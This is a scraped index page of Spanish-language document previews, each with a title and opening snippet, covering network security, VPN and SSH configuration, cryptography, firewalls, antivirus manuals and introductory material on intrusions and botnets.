ATAQUE Y CONTRAMEDIAS Unidad 3 4-5 3. AUTENTICACIÓN 4. CONTROL DE ACCESO 5. ATAQUE Y CONTRAMEDIAS jun-10 M.C. Gustavo A. Gutiérrez Carreón DEFINICIÓN AUTENTICACIÓN Autenticación o autentificación es el acto de establecimiento

Más detalles

INFORME INSTALACION Y CONFIGURACION DE UNA VPN EXAMEN FINAL PRESENTADO POR: EDINSON ACEVEDO CONTRERAS PRESENTADO A: ING.

INFORME INSTALACION Y CONFIGURACION DE UNA VPN EXAMEN FINAL PRESENTADO POR: EDINSON ACEVEDO CONTRERAS PRESENTADO A: ING. INFORME INSTALACION Y CONFIGURACION DE UNA VPN EXAMEN FINAL PRESENTADO POR: EDINSON ACEVEDO CONTRERAS 1150512 PRESENTADO A: ING. JEAN POLO CEQUEDA UNIVERSIDAD FRANCISCO DE PAULA SANTANDER FACULTAD DE INGENIERIAS

Más detalles

Servicios de Seguridad de la Información

Servicios de Seguridad de la Información Servicios de Seguridad de la Información Las siguientes actuaciones son medidas dirigidas a garantizar la Confidencialidad, Privacidad y Disponibilidad de los Servicios de la Información y que podemos

Más detalles

TEMA 3. REDES Y SEGURIDAD INFORMÁTICA

TEMA 3. REDES Y SEGURIDAD INFORMÁTICA TEMA 3. REDES Y SEGURIDAD INFORMÁTICA REDES INFORMÁTICAS. 1. Qué ventajas tiene usar ordenadores en red, frente al trabajo aislado? 2. Explica la diferencia entre el área de alcance de una red LAN y una

Más detalles

SIEWEB. La intranet corporativa de SIE

SIEWEB. La intranet corporativa de SIE La intranet corporativa de SIE por ALBA Software Acceso a los servicios SIE desde páginas Web para los usuarios de sistema *. Administración del Sistema (cuentas de usuarios, permisos, servicios, etc...)

Más detalles

CRIPTOGRAFÍA SIMÉTRICA Y ASIMÉTRICA

CRIPTOGRAFÍA SIMÉTRICA Y ASIMÉTRICA CRIPTOGRAFÍA SIMÉTRICA Y ASIMÉTRICA Para generar una transmisión segura de datos, debemos contar con un canal que sea seguro, esto es debemos emplear técnicas de forma que los datos que se envían de una

Más detalles

COMO CONFIGURAR UNA MAQUINA VIRTUAL EN VIRTUALBOX PARA ELASTIX

COMO CONFIGURAR UNA MAQUINA VIRTUAL EN VIRTUALBOX PARA ELASTIX COMO CONFIGURAR UNA MAQUINA VIRTUAL EN VIRTUALBOX PARA ELASTIX En este manual se presenta el proceso de configuración de una Maquina Virtual en VirtualBox, que será utilizada para instalar un Servidor

Más detalles

CIF-KM. GUÍA DE LOS PRIMEROS PASOS

CIF-KM. GUÍA DE LOS PRIMEROS PASOS CIF-KM. GUÍA DE LOS PRIMEROS PASOS Secciones 1. CONCEPTOS PREVIOS. 2. INSTALAR CIF-KM. 2.1 Descargar e instalar CIF-KM. 2.2 Configuración de CIF-KM. 2.3 Acceso externo al servidor de CIF-KM. 3. PRIMERA

Más detalles

Seguridad en la transmisión de Datos

Seguridad en la transmisión de Datos Seguridad en la transmisión de Datos David Peg Montalvo Santiago de Compostela Noviembre 2005 Índice 01 Seguridad. Ámbito de aplicación 02 Control de acceso 03 Conceptos básicos de criptografía 04 PKI

Más detalles

PRACTICA CAPITULO 2 MODULO 1 PROTOCOLOS Y LA FUNCIONALIDAD DE LA CAPA DE APLICACIÓN

PRACTICA CAPITULO 2 MODULO 1 PROTOCOLOS Y LA FUNCIONALIDAD DE LA CAPA DE APLICACIÓN PRACTICA CAPITULO 2 MODULO 1 PROTOCOLOS Y LA FUNCIONALIDAD DE LA CAPA DE APLICACIÓN Los protocolos de capa de aplicación de TCP/IP más conocidos son aquellos que proporcionan intercambio de la información

Más detalles

SEMANA 12 SEGURIDAD EN UNA RED

SEMANA 12 SEGURIDAD EN UNA RED SEMANA 12 SEGURIDAD EN UNA RED SEGURIDAD EN UNA RED La seguridad, protección de los equipos conectados en red y de los datos que almacenan y comparten, es un hecho muy importante en la interconexión de

Más detalles

Práctica de Seguridad en Redes

Práctica de Seguridad en Redes Práctica de Seguridad en Redes Juan Boubeta Puig y Antonio García Domínguez Seguridad y Competencias Profesionales Departamento de Ingenieria Informatica Universidad de Cadiz Curso 2012-2013 1. Descripción

Más detalles

Qué son y cómo combatirlas

Qué son y cómo combatirlas Redes zombies Qué son y cómo combatirlas Calle San Rafael, 14 28108 Alcobendas (Madrid) 902 90 10 20 www..com Introducción Hoy en día podemos encontrar un elevado número de amenazas en la red, pero unas

Más detalles

Semana 3: Con Con r t o r l de Acceso

Semana 3: Con Con r t o r l de Acceso Semana 3: Control de Acceso Intrusiones Aprendizajes esperados Contenidos: Verificación de la seguridad Detección de Intrusiones Métodos de ataque Qué es una INTRUSIÓN? Vamos a dfii definir INTRUSIÓN como

Más detalles

Propuesta de Portal de la Red de Laboratorios Virtuales y Remotos de CEA

Propuesta de Portal de la Red de Laboratorios Virtuales y Remotos de CEA Propuesta de Portal de la Red de Laboratorios Virtuales y Remotos de CEA Documento de trabajo elaborado para la Red Temática DocenWeb: Red Temática de Docencia en Control mediante Web (DPI2002-11505-E)

Más detalles

5. AMENAZAS Y ATAQUES EN REDES

5. AMENAZAS Y ATAQUES EN REDES 5. AMENAZAS Y ATAQUES EN REDES ESPERANZA ELIPE JIMENEZ CORPORATIVAS a)identidad digital.- Qué diferencias existen entre la instalación de un certificado en un servidor web y un servidor de certificaciones?.

Más detalles

RECETA ELECTRÓNICA Informe de Seguridad

RECETA ELECTRÓNICA Informe de Seguridad RECETA ELECTRÓNICA Informe de Seguridad EJIE, S.A. AVDA. MEDITERRÁNEO, 3 01010 - VITORIA-GASTEIZ 27/03/2007 1. INTRODUCCIÓN La información incluida a continuación pretende dar una información aproximada

Más detalles

Información sobre seguridad

Información sobre seguridad Información sobre seguridad SMART kapp incluye características de protección de datos diseñadas para mantener el contenido controlador de forma predecible. En esta página se explican las características

Más detalles

SERVICIOS DE RED E INTERNET TEMA 4: INSTALACIÓN Y ADMINISTRACIÓN DE SERVICIOS WEB

SERVICIOS DE RED E INTERNET TEMA 4: INSTALACIÓN Y ADMINISTRACIÓN DE SERVICIOS WEB SERVICIOS DE RED E INTERNET TEMA 4: INSTALACIÓN Y ADMINISTRACIÓN DE SERVICIOS WEB Nombre: 1. Protocolo HTTPS Hyper Text Transfer Protocol Secure (en español: Protocolo seguro de transferencia de hipertexto),

Más detalles

Proceso de cifrado. La fortaleza de los algoritmos es que son públicos, es decir, se conocen todas las transformaciones que se aplican al documento

Proceso de cifrado. La fortaleza de los algoritmos es que son públicos, es decir, se conocen todas las transformaciones que se aplican al documento Qué es AT-Encrypt nos permitirá dotar de contraseña a cualquier documento o carpeta. Este documento o carpeta sólo será legible por aquel que conozca la contraseña El funcionamiento del cifrado (o encriptación)

Más detalles

Monitorización de sistemas y servicios

Monitorización de sistemas y servicios Monitorización de sistemas y servicios Contenidos Contenidos... 1 Resumen ejecutivo... 2 Arquitectura de la plataforma de monitorización... 2 Monitorización y alarmas... 3 Monitorización... 3 Servicios

Más detalles

GATEWAYS COMO FIREWALLS

GATEWAYS COMO FIREWALLS GATEWAYS COMO FIREWALLS Ricardo Sánchez Q. Estudiante Ingeniería Telemática Aunque las empresas que han experimentado un ataque a su red por mano de usuarios no deseados, son recientes a hablar sobre sus

Más detalles

CONFIGURACIÓN BÁSICA DE UNA VPN EN WINDOWS XP PROFESIONAL

CONFIGURACIÓN BÁSICA DE UNA VPN EN WINDOWS XP PROFESIONAL CONFIGURACIÓN BÁSICA DE UNA VPN EN WINDOWS XP PROFESIONAL Explicaremos el procedimiento para configurar una VPN en Windows (R) XP, tanto en modo cliente como en modo servidor. VPN (Virtual Private Network)

Más detalles

SEGURIDAD EN REDES. NOMBRE: Daniel Leonardo Proaño Rosero. TEMA: SSH server

SEGURIDAD EN REDES. NOMBRE: Daniel Leonardo Proaño Rosero. TEMA: SSH server SEGURIDAD EN REDES NOMBRE: Daniel Leonardo Proaño Rosero TEMA: SSH server SSH (Secure SHell, en español: intérprete de órdenes segura) es el nombre de un protocolo y del programa que lo implementa, y sirve

Más detalles

Introducción. Objetivo. Implementar un detector de malware con software libre empleando el protocolo Netflow.

Introducción. Objetivo. Implementar un detector de malware con software libre empleando el protocolo Netflow. 1 Objetivo. Implementar un detector de malware con software libre empleando el protocolo Netflow. Descripción del problema. Generalmente las herramientas de seguridad como los antivirus, firewalls, IDS

Más detalles

WINDOWS 2008 5: TERMINAL SERVER

WINDOWS 2008 5: TERMINAL SERVER WINDOWS 2008 5: TERMINAL SERVER 1.- INTRODUCCION: Terminal Server proporciona una interfaz de usuario gráfica de Windows a equipos remotos a través de conexiones en una red local o a través de Internet.

Más detalles

FUNDAMENTOS DE COMPUTACION TECNOLOGIA VPN. Integrantes: Luis Mario Galarza, Andrés Santos P. INTRODUCCION ( QUE ES VPN?)

FUNDAMENTOS DE COMPUTACION TECNOLOGIA VPN. Integrantes: Luis Mario Galarza, Andrés Santos P. INTRODUCCION ( QUE ES VPN?) FUNDAMENTOS DE COMPUTACION TECNOLOGIA VPN Integrantes: Luis Mario Galarza, Andrés Santos P. INTRODUCCION ( QUE ES VPN?) La Red Privada Virtual (VPN), cuyo nombre deriva del inglés Virtual Private Network,

Más detalles

INSTITUTO TECNOLÓGICO DE LAS AMÉRICA ITLA

INSTITUTO TECNOLÓGICO DE LAS AMÉRICA ITLA INSTITUTO TECNOLÓGICO DE LAS AMÉRICA ITLA How to de como habilitar el servicio de SSH en slackware. Carlos Juan Shephard G 2013-610 Sistema Operativo III Instructor: José Doñe OpenSSH es una versión LIBRE

Más detalles

Contenido - 2. 2006 Derechos Reservados DIAN - Proyecto MUISCA

Contenido - 2. 2006 Derechos Reservados DIAN - Proyecto MUISCA Contenido 1. Introducción...3 2. Objetivos...4 3. El MUISCA Modelo Único de Ingresos, Servicio y Control Automatizado...4 4. Ingreso a los Servicios Informáticos Electrónicos...5 4.1. Inicio de Sesión

Más detalles

PRACTICA CAPITULO 2 MODULO 1 PROTOCOLOS Y LA FUNCIONALIDAD DE LA CAPA DE APLICACIÓN

PRACTICA CAPITULO 2 MODULO 1 PROTOCOLOS Y LA FUNCIONALIDAD DE LA CAPA DE APLICACIÓN PRACTICA CAPITULO 2 MODULO 1 PROTOCOLOS Y LA FUNCIONALIDAD DE LA CAPA DE APLICACIÓN Los protocolos de capa de aplicación de TCP/IP más conocidos son aquellos que proporcionan intercambio de la información

Más detalles

Administración Local Soluciones

Administración Local Soluciones SISTEMA INTEGRADO DE GESTIÓN DE EXPEDIENTES MODULAR (SIGM) MANUAL DE USUARIO DE ARCHIVO PRÉSTAMOS Y CONSULTAS SIGM v3 Administración Local Soluciones Control de versiones Versión Fecha aprobación Cambio

Más detalles

Cómo instalar fácilmente tu WordPress tras contratar un hosting en Hostalia

Cómo instalar fácilmente tu WordPress tras contratar un hosting en Hostalia Cómo instalar fácilmente tu WordPress tras contratar un hosting en Hostalia Cardenal Gardoki, 1 48008 BILBAO (Vizcaya) Teléfono: 902 012 199 www.hostalia.com La puesta en marcha de WordPress es muy sencilla,

Más detalles

Mini Guía para usar las Keops en el ITAM

Mini Guía para usar las Keops en el ITAM Mini Guía para usar las Keops en el ITAM Adrián Puente Z. Sala de Servidores Instituto Tecnológico Autónomo de México 7 de abril de 2005 1 1. Introducción. Cómo alumno de la materia de Sistemas Operativos

Más detalles

Redes Locales: El protocolo TCP/IP

Redes Locales: El protocolo TCP/IP Redes Locales: El protocolo TCP/IP Los protocolos de red son las reglas que siguen los equipos conectados a la red para poder comunicarse entre sí, y hablar así el mismo idioma. El grupo de protocolos

Más detalles

TRANSFERENCIA DE FICHEROS FTP

TRANSFERENCIA DE FICHEROS FTP TRANSFERENCIA DE FICHEROS FTP INTRODUCCIÓN Internet basa su funcionamiento en un conjunto de protocolos de red sin los cuales la comunicación, a cualquier nivel, sería imposible. Algunos de los protocolos

Más detalles

Información sobre seguridad

Información sobre seguridad Información sobre seguridad SMART kapp iq incluye características de seguridad de datos diseñadas para mantener su contenido de controlado de forma predecible. En esta página se explican las características

Más detalles

Antivirus PC (motor BitDefender) Manual de Usuario

Antivirus PC (motor BitDefender) Manual de Usuario Antivirus PC (motor BitDefender) Manual de Usuario Índice 1. Introducción... 3 2. Qué es Antivirus PC?... 3 a. Eficacia... 3 b. Actualizaciones... 4 3. Requisitos técnicos... 4 a. Conocimientos técnicos...

Más detalles

TPV VIRTUAL O PASARELA DE PAGOS DE CAJASTUR

TPV VIRTUAL O PASARELA DE PAGOS DE CAJASTUR TPV VIRTUAL O PASARELA DE PAGOS DE CAJASTUR El TPV (Terminal Punto de Venta) Virtual es un producto dirigido a empresas y comercios, con tienda en internet, que permite el cobro de las ventas realizadas

Más detalles

Departamento CERES Área de Tarjetas Inteligentes Manual de Usuario

Departamento CERES Área de Tarjetas Inteligentes Manual de Usuario 14 CORREO SEGURO. Hay aplicaciones de correo que permiten enviar y recibir correos cifrados y firmados digitalmente utilizando criptografía. Estas operaciones garantizan el intercambio seguro de información,

Más detalles

Software de Comunicaciones. Práctica 7 - Secure Shell. SSH

Software de Comunicaciones. Práctica 7 - Secure Shell. SSH Software de Comunicaciones Práctica 7 - Secure Shell. SSH Juan Díez-Yanguas Barber Software de Comunicaciones Ingeniería Informática - 5º Curso Jdyb - Mayo 2013 Juan Díez- Yanguas Barber Práctica 7 Índice

Más detalles

Almacenamiento virtual de sitios web HOSTS VIRTUALES

Almacenamiento virtual de sitios web HOSTS VIRTUALES Almacenamiento virtual de sitios web HOSTS VIRTUALES El término Hosting Virtual se refiere a hacer funcionar más de un sitio web (tales como www.company1.com y www.company2.com) en una sola máquina. Los

Más detalles

OBJETIVOS DE APRENDIZAJE

OBJETIVOS DE APRENDIZAJE PLAN DE ESTUDIOS: SEGUNDO CICLO ESPECIALIDAD COMPUTACIÓN 4 to AÑO CAMPO DE FORMACIÓN: ESPECIALIZACIÓN ÁREA DE ESPECIALIZACIÓN: EQUIPOS, INSTALACIONES Y SISTEMAS UNIDAD CURRICULAR: ADMINISTRACIÓN DE SISTEMAS

Más detalles

HOWTO: Cómo configurar el firewall para redes VPN

HOWTO: Cómo configurar el firewall para redes VPN HOWTO: Cómo configurar el firewall para redes VPN Casos de uso para configurar VPN con GateDefender Integra Panda Security desea que obtenga el máximo beneficio de sus unidades GateDefender Integra. Para

Más detalles

Escudo Movistar Guía Rápida de Instalación Dispositivos Symbian

Escudo Movistar Guía Rápida de Instalación Dispositivos Symbian Escudo Movistar Guía Rápida de Instalación Dispositivos Symbian Guía de Instalación Página 1 Índice ESCUDO MOVISTAR.... 3 1. INSTALACIÓN DEL SERVICIO ESCUDO MOVISTAR... 3 1.1. VERSIONES SOPORTADAS... 3

Más detalles

Infraestructura Tecnológica. Sesión 10: Sistemas cortafuego

Infraestructura Tecnológica. Sesión 10: Sistemas cortafuego Infraestructura Tecnológica Sesión 10: Sistemas cortafuego Contextualización Actualmente tendemos a utilizar los sistemas de comunicación en una forma masiva, por lo que no siempre tenemos el cuidado adecuado

Más detalles

Cómo afrontar la Seguridad en Redes Abiertas: Consideraciones Técnicas y Escenarios.

Cómo afrontar la Seguridad en Redes Abiertas: Consideraciones Técnicas y Escenarios. Cómo afrontar la Seguridad en Redes Abiertas: Consideraciones Técnicas y Escenarios. Encarnación Sánchez Vicente 1. INTRODUCCIÓN No cabe ninguna duda que en nuestros días, la información es la clave. Esta

Más detalles

Resumen del trabajo sobre DNSSEC

Resumen del trabajo sobre DNSSEC Resumen del trabajo sobre Contenido 1. -...2 1.1. - Definición...2 1.2. - Seguridad basada en cifrado...2 1.3. - Cadenas de confianza...3 1.4. - Confianzas...4 1.5. - Islas de confianza...4 2. - Conclusiones...5

Más detalles

Ayuda para la instalación Componente Firma Digital INDICE. 1 Configuración previa...2. 1.1 Configuración Internet Explorer para ActiveX...

Ayuda para la instalación Componente Firma Digital INDICE. 1 Configuración previa...2. 1.1 Configuración Internet Explorer para ActiveX... INDICE 1 Configuración previa...2 1.1 Configuración Internet Explorer para ActiveX...2 1.2 Problemas comunes en sistema operativo Windows...8 1.2.1 Usuarios con sistema operativo Windows XP con el Service

Más detalles

Servicio de Notificaciones Electrónicas y Dirección Electrónica Habilitada

Servicio de Notificaciones Electrónicas y Dirección Electrónica Habilitada Servicio de Notificaciones Electrónicas y Dirección Electrónica Habilitada Apartado Postal Electrónico Manual de Configuración de Navegadores Abril 2011 Versión: Abril 2011 Página 1 de 28 Índice de Contenidos

Más detalles

Configuración de Aspel-SAE 6.0 para trabajar Remotamente

Configuración de Aspel-SAE 6.0 para trabajar Remotamente Configuración de Aspel-SAE 6.0 para trabajar Remotamente Para poder configurar Aspel-SAE 6.0 como Servidor Remoto se necesita realizar lo siguiente: 1. Instalar y/o configurar el IIS que se tenga de acuerdo

Más detalles

Autenticación Centralizada

Autenticación Centralizada Autenticación Centralizada Ing. Carlos Rojas Castro Herramientas de Gestión de Redes Introducción En el mundo actual, pero en especial las organizaciones actuales, los usuarios deben dar pruebas de quiénes

Más detalles

HOWTO: Cómo configurar DNAT para publicar los servicios internos hacia Internet

HOWTO: Cómo configurar DNAT para publicar los servicios internos hacia Internet HOWTO: Cómo configurar DNAT para publicar los servicios internos hacia Internet Casos de uso para configurar VPN con GateDefender Integra Panda Security desea que obtenga el máximo beneficio de sus unidades

Más detalles

REDES DE ÁREA LOCAL. APLICACIONES Y SERVICIOS EN WINDOWS

REDES DE ÁREA LOCAL. APLICACIONES Y SERVICIOS EN WINDOWS REDES DE ÁREA LOCAL. APLICACIONES Y SERVICIOS EN WINDOWS Servicio DNS - 1 - Servicio DNS...- 3 - Definición... - 3 - Instalación... - 5 - Configuración del Servidor DNS...- 10 - - 2 - Servicio DNS Definición

Más detalles

Toda base de datos relacional se basa en dos objetos

Toda base de datos relacional se basa en dos objetos 1. INTRODUCCIÓN Toda base de datos relacional se basa en dos objetos fundamentales: las tablas y las relaciones. Sin embargo, en SQL Server, una base de datos puede contener otros objetos también importantes.

Más detalles

MENSAREX: SISTEMA DE MENSAJERÍA DEL MINREX Gretel García Gómez gretel@minrex.gov.cu Ministerio de Relaciones Exteriores Cuba.

MENSAREX: SISTEMA DE MENSAJERÍA DEL MINREX Gretel García Gómez gretel@minrex.gov.cu Ministerio de Relaciones Exteriores Cuba. MENSAREX: SISTEMA DE MENSAJERÍA DEL MINREX Gretel García Gómez gretel@minrex.gov.cu Ministerio de Relaciones Exteriores Cuba Resumen El presente trabajo da solución a dos de los problemas informáticos

Más detalles

Seguridad en Administración de Redes. INTEGRANTES: Santa Elena Rodríguez Calzada María de los Ángeles Ramírez Ortiz Liliana Gpe. Olivares Valdovinos.

Seguridad en Administración de Redes. INTEGRANTES: Santa Elena Rodríguez Calzada María de los Ángeles Ramírez Ortiz Liliana Gpe. Olivares Valdovinos. Seguridad en Administración de Redes INTEGRANTES: Santa Elena Rodríguez Calzada María de los Ángeles Ramírez Ortiz Liliana Gpe. Olivares Valdovinos. Administración de Seguridad en Redes La administración

Más detalles

Configuración de Aspel-SAE 6.0 para trabajar Remotamente

Configuración de Aspel-SAE 6.0 para trabajar Remotamente Configuración de Aspel-SAE 6.0 para trabajar Remotamente Para poder configurar Aspel-SAE 6.0 como Servidor Remoto, se necesita realizar lo siguiente: 1. Instalar y/o configurar el IIS que se tenga de acuerdo

Más detalles

Manual Básico de Helm 4.2 para Usuarios:

Manual Básico de Helm 4.2 para Usuarios: Manual Básico de Helm 4.2 para Usuarios: Ante todo queremos agradecerle por elegir a para trabajar junto a usted. Esperamos que este manual lo ayude a trabajar con comodidad y facilidad. Este manual es

Más detalles

LOS VIRUS IMFORMÁTICOS

LOS VIRUS IMFORMÁTICOS LOS VIRUS IMFORMÁTICOS La mayoría de los ordenadores se encuentra conectados a una red, y la más utilizada es internet: VENTAJAS: Facilidad de acceso y de transmisión de la información. DEVENTAJAS: Mayor

Más detalles

BBVA emarkets Seguridad

BBVA emarkets Seguridad BBVA emarkets Seguridad BBVA emarkets BBVA emarkets es un sistema para realizar operaciones mediante Internet. El sistema no requiere la instalación de software y se puede ingresar a él mediante un navegador

Más detalles

Servicio de Informática Vicerrectorado de Tecnologías de la Información y la Comunicación

Servicio de Informática Vicerrectorado de Tecnologías de la Información y la Comunicación Vicerrectorado de Tecnologías de la Información y la Comunicación Conexión mediante Escritorio Remoto de Windows Última Actualización 16 de septiembre de 2013 Histórico de cambios Fecha Descripción Autor

Más detalles

MANUAL DE PROCEDIMIENTO: CONFIGURACION DE CONEXION WIFI SEGURA EN EL HOGAR.

MANUAL DE PROCEDIMIENTO: CONFIGURACION DE CONEXION WIFI SEGURA EN EL HOGAR. Página 1 de 20 MANUAL DE CONFIGURACION DE CONEXION WIFI EN EL HOGAR. INDICE: 1. INTRODUCCION Pag. 2 2. REQUISITOS Pag. 2 3. PUNTOS OBLIGATORIOS: 1. 2. 3. 4. 5. Conexión al router por interface web Cambio

Más detalles

MT01 MANUAL TÉCNICO CONEXIONES VPN. Fecha: 30/11/11

MT01 MANUAL TÉCNICO CONEXIONES VPN. Fecha: 30/11/11 Fecha: 30/11/11 Índice de contenido 1.Introducción...3 1.1. Para qué sirve?...3 1.2. Cómo funciona?...3 1.3.Beneficios...4 1.4. Cómo lo instalo?...4 1.5. Como afecta a las reglas del Firewall?...4 1.6.

Más detalles

Manual de Palm BlueChat 2.0

Manual de Palm BlueChat 2.0 Manual de Palm BlueChat 2.0 Copyright 2002 Palm, Inc. Todos los derechos reservados. Graffiti, HotSync y Palm OS son marcas registradas de Palm, Inc. El logotipo de HotSync, Palm y el logotipo de Palm

Más detalles

UNIVERSIDAD DE LA RIOJA

UNIVERSIDAD DE LA RIOJA PLIEGO DE PRESCRIPCIONES TÉCNICAS PARA EL CONTRATO DE SERVICIO DE MANTENIMIENTO DE CORTAFUEGOS Y SERVICIOS DE SEGURIDAD DE LA UNIVERSIDAD DE LA RIOJA Página 1 PLIEGO DE PRESCRIPCIONES TÉCNICAS PARA EL

Más detalles

VPN. Luis Opazo A. Dirección de Informática. Temuco, 10 de Septiembre 2010. Quées una VPN?

VPN. Luis Opazo A. Dirección de Informática. Temuco, 10 de Septiembre 2010. Quées una VPN? VPN Luis Opazo A. Dirección de Informática Temuco, 10 de Septiembre 2010 Quées una VPN? VPN (Virtual Private Network) es la forma de interconexión de distintas redes separadas geográficamente mediante

Más detalles

Tecnología IP para videovigilancia... Los últimos avances han hecho posible conectar cámaras directamente a una red de ordenadores basada en el

Tecnología IP para videovigilancia... Los últimos avances han hecho posible conectar cámaras directamente a una red de ordenadores basada en el para videovigilancia....... Los últimos avances han hecho posible conectar cámaras directamente a una red de ordenadores basada en el protocolo IP. La tecnología de las cámaras de red permite al usuario

Más detalles

QUÉ ES UN SERVIDOR Y CUÁLES SON LOS PRINCIPALES TIPOS DE SERVIDORES? (PROXY, DNS, WEB, FTP, SMTP, ETC.) (DV00408A)

QUÉ ES UN SERVIDOR Y CUÁLES SON LOS PRINCIPALES TIPOS DE SERVIDORES? (PROXY, DNS, WEB, FTP, SMTP, ETC.) (DV00408A) APRENDERAPROGRAMAR.COM QUÉ ES UN SERVIDOR Y CUÁLES SON LOS PRINCIPALES TIPOS DE SERVIDORES? (PROXY, DNS, WEB, FTP, SMTP, ETC.) (DV00408A) Sección: Divulgación Categoría: Herramientas Informáticas Fecha

Más detalles